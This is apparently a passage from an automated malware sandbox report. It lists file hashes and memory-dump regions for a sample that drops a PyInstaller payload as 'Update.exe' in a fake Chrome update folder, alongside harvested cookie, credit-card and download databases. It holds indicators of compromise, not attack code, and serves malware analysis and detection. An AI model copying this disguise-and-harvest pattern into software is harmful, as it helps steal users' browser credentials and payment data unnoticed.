e1d6f78a72836ea120bd27a33ae89cbdc3f3ca7d9d0231aaa3aac91996d2fa4e

SHA512
aa6afd6bea27f554e3646152d8c4f96f7bcaaa4933f8b7c04346e410f93f23cfa6d29362fd5d51ccbb8b6223e094cd89e351f072ad0517553703f5bf9de28778

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI30962\_bz2.pyd

Filesize
43KB

MD5
3c3666aaaeec004f9cca27fa58462b67

SHA1
e22130c4da65cc16061dade0c4bc6a5e2620b016

SHA256
5bc19afcdce72356fe02c8b0c56d433735002f378f606d3bc805612dd55f0700

SHA512
375dacb3dfdd7b7ffa9a523cacb54901d9fd8dfc3e77302ab70f5ea613d50c2d2658c3690bb396f63e5c64536164f68294c90d0e7ee38998ca282aa5750f308d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI30962\_decimal.pyd

Filesize
102KB

MD5
e002b1e850d717a481a41eaab6974692

SHA1
5df2af727ecfca4813af236fa3db74072d84b567

SHA256
08fe0af9fd2621766487c7cd8ddc1256ee8e69eec4b39ecac9e189cbdce7fbfc

SHA512
27ad2308bb3f537de3dac17d93924a958769cf1a38968f5508e5c41d6d4fcaa4df6e9a04bf879e848b4a1e4c53d89048b1e50f0b6b34d26e500214fe90bc57da

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI30962\_hashlib.pyd

Filesize
30KB

MD5
8ed3ddd939e5eb66337db1fe681e0216

SHA1
d2266cbfdee27e84ba725db11f0145f3be2cef6b

SHA256
bc0ca072d0a3fbd1381b68a1af909cbf573eb9d5b39eb52676451982d64f9556

SHA512
97ca90dc3d329bc950c04e43be2c258f6c2e1ebd178533b7bb536a48071809a63525873b12d70cd033df03c257abc2f2ebbd2f7a5ef5a7624dbed73cb9cf2359

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI30962\_lzma.pyd

Filesize
81KB

MD5
aafcef2759546c41b30707e5051b8055

SHA1
636f78b50a75ec5547e7055d00a96f4fbf29bcfe

SHA256
7b35df1441247ff2421d31ae858776308b4dde90859b9d452b3814c60adde567

SHA512
3cdb0e263abe6d091af098b9e6a21f26d3681057c1be6dd886418b3d15c38626ee1c999a4ce4a761247e8211b3f65e7b8ce9a78521e66ec06c675c02c71a9d0d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI30962\_socket.pyd

Filesize
38KB

MD5
1122f48df3aeee378ef9e91d077aa7b6

SHA1
72545b83fdc79f300db0663e5ecd2dfde4a0ae11

SHA256
3bf50b79c667dbfc8e4485886c42bf8e6fef4e7f4a64944fecd82a9f03dd5f74

SHA512
b741b8e2ad6ca7a06303322746d4a9f4949bf3ae942fdd561cde639c374ec11e8b8bb0abb57b417f773446dbfbe6c07ef0ea2ad74483ce689049f51fe83647a1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI30962\base_library.zip

Filesize
857KB

MD5
4be939938320504927755ab629d45651

SHA1
0fd416e6e78393e377491ec50bc0e4f161145e7a

SHA256
d421ec9920edf6261d970ffbdb4357360851bd76a66dbd7410ea2afe5eaabd47

SHA512
736e2ca9caa54128c5376140876b12306aeab8afe8186ae2ab8f3c7b27659395fe27bbe63150b97a36956e0e56b17a096f0468cf86ac96df08c03233bd331df0

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI30962\libcrypto-1_1.dll

Filesize
1.1MB

MD5
4dc7da1ac1c40196ef9cf2081ebcaaf4

SHA1
1dd5ffb0de01c759f84a3a4f185bf99539b8d68e

SHA256
84ce58b5132ee40cef1eefb03848fc5700ab0451614700f57f9f10b7607b75ee

SHA512
59b7f4b1a479a03aee0701856069734cc2299dbf5ad77c18ee5fa30fe7da0c01946337c463dd22ea487ce89128a46989b056ab146465e2e46a06cd160e5fc65a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI30962\python310.dll

Filesize
1.4MB

MD5
877216254a6f9a4391fb72f8e026df4f

SHA1
3066bf0183e6c387245257b705492d3e7a766ec4

SHA256
0679dcddc7f380e7150412b5b125161c69d28e374ec3aa965e5146d7d474e240

SHA512
c9deca9ba5fd4cf848d0b1d10ca6ce40a8a625cf1f2dc6556d290283beb849c380c531b063b6cd03a44dd2055c8f125e2fc4325121584b981bbd1e5310a6a20e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI30962\select.pyd

Filesize
21KB

MD5
b061d94a2dc234667e88d451caf3eef3

SHA1
109df60f2db5f3b2d30dd244e91cbfe28a2fee27

SHA256
3076bb746f4288c063e0e42791f04c505302f0eda66499a40e249d25055f0a01

SHA512
47005e8f58d68abce23e89d6c89e81ca2ce994d9fdd75a06d6f190a3f1edcb4957786ec459963477275fccbc21b6157f2e15ed61f303023a262f94f5137f2ec3

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI30962\unicodedata.pyd

Filesize
285KB

MD5
9b26dc6f5d222b98507778f5ec4e1b51

SHA1
b042736c47d2ecf545ab3b8ba1fb5fec9e504c26

SHA256
5a9e1b7e835dda682563b0bfbd13be267f9e02f0ad823fa2cbfd9f7bc8790669

SHA512
e23fc212fc6a3a155b12d2d25b76317a500ee8021446cf5f4f7e0d0f98c3ec9c3c68a621854af0c275961a7344b9bae2a562734f4d58de8949a8e2f25fec0c7c

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4mbjsdom.4cg.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe

Filesize
5.6MB

MD5
3d3c49dd5d13a242b436e0a065cd6837

SHA1
e38a773ffa08452c449ca5a880d89cfad24b6f1b

SHA256
e0338c845a876d585eceb084311e84f3becd6fa6f0851567ba2c5f00eeaf4ecf

SHA512
dd0e590310392b0543d47a2d24d55f6f091ba59acc0d7ea533039ffb48f1b8938587889bcfa19b0538a62ba26fcde2172253860ceab34af40fd7bf65b6587b00

Download Submit
C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\cookies_db

Filesize
20KB

MD5
c9ff7748d8fcef4cf84a5501e996a641

SHA1
02867e5010f62f97ebb0cfb32cb3ede9449fe0c9

SHA256
4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988

SHA512
d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

Download Submit
C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\credit_cards_db

Filesize
92KB

MD5
cae9079afcb4c379869afa5d34181d8a

SHA1
188e2435c533dd9633f5fcc09f245ddc1a78db2c

SHA256
2be0a96da90da69fbc34b8e7747e89ce57dfc4fb58ed6c79e0fc21cb7c6791b7

SHA512
ff7d863ebd1090219f07eaf2ac493f20b6ed11606e7f2c19536d764e730a8bb426fff26dc3890f0503c12329ea4a6c5d8812a0d1b69c19a29fbb8cb8366bd4fd

Download Submit
C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\downloads_db

Filesize
148KB

MD5
90a1d4b55edf36fa8b4cc6974ed7d4c4

SHA1
aba1b8d0e05421e7df5982899f626211c3c4b5c1

SHA256
7cf3e9e8619904e72ea6608cc43e9b6c9f8aa2af02476f60c2b3daf33075981c

SHA512
ea0838be754e1258c230111900c5937d2b0788f90bbf7c5f82b2ceda7868e50afb86c301f313267eaa912778da45755560b5434885521bf915967a7863922ae2

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_640_480_POS4.jpg

Filesize
19KB

MD5
702b075dc6b6a632e7ec94cea02bb4f6

SHA1
d84acb1bd516917560b188d25902a58e388f5b73

SHA256
4ad6d6ecd2e8df67ba218c6c811d0fe1b3725b21ec9d4db6935de12c00141405

SHA512
99ae4beb361a7fd91e5c85e21ca4f15ae6de2e9fc63a0f9bef0abf93a77b0c770ab0ed34bd36bae34e17a768574274a301e21a0e1c38ee570006cf29947e3a48

Download Submit
C:\Users\Admin\Videos\Captures\desktop.ini

Filesize
190B

MD5
b0d27eaec71f1cd73b015f5ceeb15f9d

SHA1
62264f8b5c2f5034a1e4143df6e8c787165fbc2f

SHA256
86d9f822aeb989755fac82929e8db369b3f5f04117ef96fd76e3d5f920a501d2

SHA512
7b5c9783a0a14b600b156825639d24cbbc000f5066c48ce9fecc195255603fc55129aaaca336d7ce6ad4e941d5492b756562f2c7a1d151fcfc2dabac76f3946c

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI14322\VCRUNTIME140.dll

Filesize
95KB

MD5
f34eb034aa4a9735218686590cba2e8b

SHA1
2bc20acdcb201676b77a66fa7ec6b53fa2644713

SHA256
9d2b40f0395cc5d1b4d5ea17b84970c29971d448c37104676db577586d4ad1b1

SHA512
d27d5e65e8206bd7923cf2a3c4384fec0fc59e8bc29e25f8c03d039f3741c01d1a8c82979d7b88c10b209db31fbbec23909e976b3ee593dc33481f0050a445af

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI14322\python310.dll

Filesize
4.3MB

MD5
63a1fa9259a35eaeac04174cecb90048

SHA1
0dc0c91bcd6f69b80dcdd7e4020365dd7853885a

SHA256
14b06796f288bc6599e458fb23a944ab0c843e9868058f02a91d4606533505ed

SHA512
896caa053f48b1e4102e0f41a7d13d932a746eea69a894ae564ef5a84ef50890514deca6496e915aae40a500955220dbc1b1016fe0b8bcdde0ad81b2917dea8b

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI19522\_ctypes.pyd

Filesize
53KB

MD5
1e9a2896a73f76f4358f16f5dd9c2df9

SHA1
c775ef407604793d56f919f24b6226baef750552

SHA256
bbb53f57b8e2882a84dce0282d4017333107ca345126c9bba5cb0a6893304058

SHA512
8d19c24a1480afaf57a182a1df8f49cf8ac683101e3fe5b0b75a8c947627f6cb805126db4f4c261302acfb1af7b76bd3226524045404aaeb4cf3cdeb2db72d49

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI19522\libffi-7.dll

Filesize
23KB

MD5
6f818913fafe8e4df7fedc46131f201f

SHA1
bbb7ba3edbd4783f7f973d97b0b568cc69cadac5

SHA256
3f94ee4f23f6c7702ab0cc12995a6457bf22183fa828c30cc12288adf153ae56

SHA512
5473fe57dc40af44edb4f8a7efd68c512784649d51b2045d570c7e49399990285b59cfa6bcd25ef1316e0a073ea2a89fe46be3bfc33f05e3333037a1fd3a6639

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI19522\sqlite3.dll

Filesize
605KB

MD5
41aa1c3dc8c447c689ca471fa50b7f92

SHA1
d26b497368727e48a3609a6a59868ad63bf8368b

SHA256
4ba95ea41aa74042e5a97a3f671a9eb3001901cdf4a213b35815c4b9f4c11df7

SHA512
997067c4cb685b0d4f6caa7e0e276e85fc7ab653f67fc4b586e97a9dddb1ccc41622e75dba60f9e90e9d06b2724db3719c9fb404ac7c16bc55511da857085541

Download Submit
memory/2276-2780-0x00007FFB701C0000-0x00007FFB701DE000-memory.dmp

Filesize
120KB

Download
memory/2276-2778-0x00007FFB70200000-0x00007FFB7022C000-memory.dmp

Filesize
176KB

Download
memory/2276-156-0x00007FFB6A640000-0x00007FFB6A758000-memory.dmp

Filesize
1.1MB

Download
memory/2276-153-0x00007FFB6B1E0000-0x00007FFB6B296000-memory.dmp

Filesize
728KB

Download
memory/2276-152-0x00007FFB6C400000-0x00007FFB6C774000-memory.dmp

Filesize
3.5MB

Download
memory/2276-151-0x00007FFB70000000-0x00007FFB7002E000-memory.dmp

Filesize
184KB

Download
memory/2276-2693-0x00007FFB6C780000-0x00007FFB6CBE5000-memory.dmp

Filesize
4.4MB

Download
memory/2276-150-0x00007FFB702F0000-0x00007FFB702FD000-memory.dmp

Filesize
52KB

Download
memory/2276-144-0x00007FFB70300000-0x00007FFB7030F000-memory.dmp

Filesize
60KB

Download
memory/2276-155-0x00007FFB6FFD0000-0x00007FFB6FFDD000-memory.dmp

Filesize
52KB

Download
memory/2276-154-0x00007FFB6FFE0000-0x00007FFB6FFF5000-memory.dmp

Filesize
84KB

Download
memory/2276-146-0x00007FFB701E0000-0x00007FFB701F9000-memory.dmp

Filesize
100KB

Download
memory/2276-2787-0x00007FFB6FFE0000-0x00007FFB6FFF5000-memory.dmp

Filesize
84KB

Download
memory/2276-2741-0x00007FFB70310000-0x00007FFB70334000-memory.dmp

Filesize
144KB

Download
memory/2276-2788-0x00007FFB6FFD0000-0x00007FFB6FFDD000-memory.dmp

Filesize
52KB

Download
memory/2276-2789-0x00007FFB6A640000-0x00007FFB6A758000-memory.dmp

Filesize
1.1MB

Download
memory/2276-2775-0x00007FFB6C780000-0x00007FFB6CBE5000-memory.dmp

Filesize
4.4MB

Download
memory/2276-2776-0x00007FFB70310000-0x00007FFB70334000-memory.dmp

Filesize
144KB

Download
memory/2276-149-0x00007FFB70030000-0x00007FFB70049000-memory.dmp

Filesize
100KB

Download
memory/2276-2777-0x00007FFB70300000-0x00007FFB7030F000-memory.dmp

Filesize
60KB

Download
memory/2276-2781-0x00007FFB70050000-0x00007FFB701BD000-memory.dmp

Filesize
1.4MB

Download
memory/2276-2785-0x00007FFB6C400000-0x00007FFB6C774000-memory.dmp

Filesize
3.5MB

Download
memory/2276-2784-0x00007FFB70000000-0x00007FFB7002E000-memory.dmp

Filesize
184KB

Download
memory/2276-2783-0x00007FFB702F0000-0x00007FFB702FD000-memory.dmp

Filesize
52KB

Download
memory/2276-2782-0x00007FFB70030000-0x00007FFB70049000-memory.dmp

Filesize
100KB

Download
memory/2276-2786-0x00007FFB6B1E0000-0x00007FFB6B296000-memory.dmp

Filesize
728KB

Download
memory/2276-148-0x00007FFB70050000-0x00007FFB701BD000-memory.dmp

Filesize
1.4MB

Download
memory/2276-2779-0x00007FFB701E0000-0x00007FFB701F9000-memory.dmp

Filesize
100KB

Download
memory/2276-86-0x00007FFB6C780000-0x00007FFB6CBE5000-memory.dmp

Filesize
4.4MB

Download
memory/2276-147-0x00007FFB701C0000-0x00007FFB701DE000-memory.dmp

Filesize
120KB

Download
memory/2276-112-0x00007FFB70310000-0x00007FFB70334000-memory.dmp

Filesize
144KB

Download
memory/2276-145-0x00007FFB70200000-0x00007FFB7022C000-memory.dmp

Filesize
176KB

Download
memory/2360-173-0x0000018AE6980000-0x0000018AE69F6000-memory.dmp

Filesize
472KB

Download
memory/2360-168-0x0000018AE67C0000-0x0000018AE67E2000-memory.dmp

Filesize
136KB

Download
memory/4192-557-0x00000158EC660000-0x00000158EC67E000-memory.dmp

Filesize
120KB

Download
memory/4192-413-0x00000158EA3F0000-0x00000158EA990000-memory.dmp

Filesize
5.6MB

Download
memory/4984-568-0x00000105C5340000-0x00000105C5348000-memory.dmp

Filesize
32KB

Download
memory/5068-20-0x00007FFB6C780000-0x00007FFB6CBE5000-memory.dmp

Filesize
4.4MB

Download
memory/5328-642-0x00000204690A0000-0x00000204690A1000-memory.dmp

Filesize
4KB

Download
memory/5328-598-0x00000204690A0000-0x00000204690A1000-memory.dmp

Filesize
4KB

Download
memory/5328-640-0x00000204690A0000-0x00000204690A1000-memory.dmp

Filesize
4KB

Download
memory/5328-638-0x00000204690A0000-0x00000204690A1000-memory.dmp

Filesize
4KB

Download
memory/5328-636-0x00000204690A0000-0x00000204690A1000-memory.dmp

Filesize
4KB

Download
memory/5328-634-0x00000204690A0000-0x00000204690A1000-memory.dmp

Filesize
4KB

Download
memory/5328-632-0x00000204690A0000-0x00000204690A1000-memory.dmp

Filesize
4KB

Download
memory/5328-630-0x00000204690A0000-0x00000204690A1000-memory.dmp

Filesize
4KB

Download
memory/5328-628-0x00000204690A0000-0x00000204690A1000-memory.dmp

Filesize
4KB

Download
memory/5328-626-0x00000204690A0000-0x00000204690A1000-memory.dmp

Filesize
4KB

Download
memory/5328-624-0x00000204690A0000-0x00000204690A1000-memory.dmp

Filesize
4KB

Download
memory/5328-622-0x00000204690A0000-0x00000204690A1000-memory.dmp

Filesize
4KB

Download
memory/5328-620-0x00000204690A0000-0x00000204690A1000-memory.dmp

Filesize
4KB

Download
memory/5328-618-0x00000204690A0000-0x00000204690A1000-memory.dmp

Filesize
4KB

Download
memory/5328-616-0x00000204690A0000-0x00000204690A1000-memory.dmp

Filesize
4KB

Download
memory/5328-614-0x00000204690A0000-0x00000204690A1000-memory.dmp

Filesize
4KB

Download
memory/5328-612-0x00000204690A0000-0x00000204690A1000-memory.dmp

Filesize
4KB

Download
memory/5328-610-0x00000204690A0000-0x00000204690A1000-memory.dmp

Filesize
4KB

Download
memory/5328-608-0x00000204690A0000-0x00000204690A1000-memory.dmp

Filesize
4KB

Download
memory/5328-606-0x00000204690A0000-0x00000204690A1000-memory.dmp

Filesize
4KB

Download
memory/5328-604-0x00000204690A0000-0x00000204690A1000-memory.dmp

Filesize
4KB

Download
memory/5328-602-0x00000204690A0000-0x00000204690A1000-memory.dmp

Filesize
4KB

Download
memory/5328-600-0x00000204690A0000-0x00000204690A1000-memory.dmp

Filesize
4KB

Download
memory/5328-644-0x00000204690A0000-0x00000204690A1000-memory.dmp

Filesize
4KB

Download
memory/5328-596-0x00000204690A0000-0x00000204690A1000-memory.dmp

Filesize
4KB

Download
memory/5328-594-0x00000204690A0000-0x00000204690A1000-memory.dmp

Filesize
4KB

Download
memory/5328-592-0x00000204690A0000-0x00000204690A1000-memory.dmp

Filesize
4KB

Download
memory/5328-590-0x00000204690A0000-0x00000204690A1000-memory.dmp

Filesize
4KB

Download
memory/5328-581-0x0000020469070000-0x0000020469071000-memory.dmp

Filesize
4KB

Download
memory/5328-582-0x00000204690A0000-0x00000204690A1000-memory.dmp

Filesize
4KB

Download
memory/5328-588-0x00000204690A0000-0x00000204690A1000-memory.dmp

Filesize
4KB

Download
memory/5328-584-0x00000204690A0000-0x00000204690A1000-memory.dmp

Filesize
4KB

Download
memory/5328-586-0x00000204690A0000-0x00000204690A1000-memory.dmp

Filesize
4KB

Download
memory/6292-24592-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/6292-24570-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/6800-2152-0x000002D9F1580000-0x000002D9F15BA000-memory.dmp

Filesize
232KB

Download
memory/6800-2142-0x000002D9F1120000-0x000002D9F112A000-memory.dmp

Filesize
40KB

Download
memory/6800-2143-0x000002D9F1490000-0x000002D9F14FA000-memory.dmp

Filesize
424KB

Download
memory/6800-2153-0x000002D9F10F0000-0x000002D9F1115000-memory.dmp

Filesize
148KB

Download
memory/6800-2166-0x000002D9F15C0000-0x000002D9F15D2000-memory.dmp

Filesize
72KB

Download
memory/6800-2603-0x000002D9F2800000-0x000002D9F28AA000-memory.dmp

Filesize
680KB

Download
memory/6884-2981-0x0000019F75C20000-0x0000019F75C3C000-memory.dmp

Filesize
112KB

Download
memory/6884-2987-0x0000019F76120000-0x0000019F761D9000-memory.dmp

Filesize
740KB

Download
memory/6884-3022-0x0000019F75C40000-0x0000019F75C4A000-memory.dmp

Filesize
40KB

Download
memory/6900-24617-0x0000000004920000-0x0000000005B4A000-memory.dmp

Filesize
18.2MB

Download
memory/6900-24632-0x0000000004920000-0x0000000005B4A000-memory.dmp

Filesize
18.2MB

Download
memory/7564-26824-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download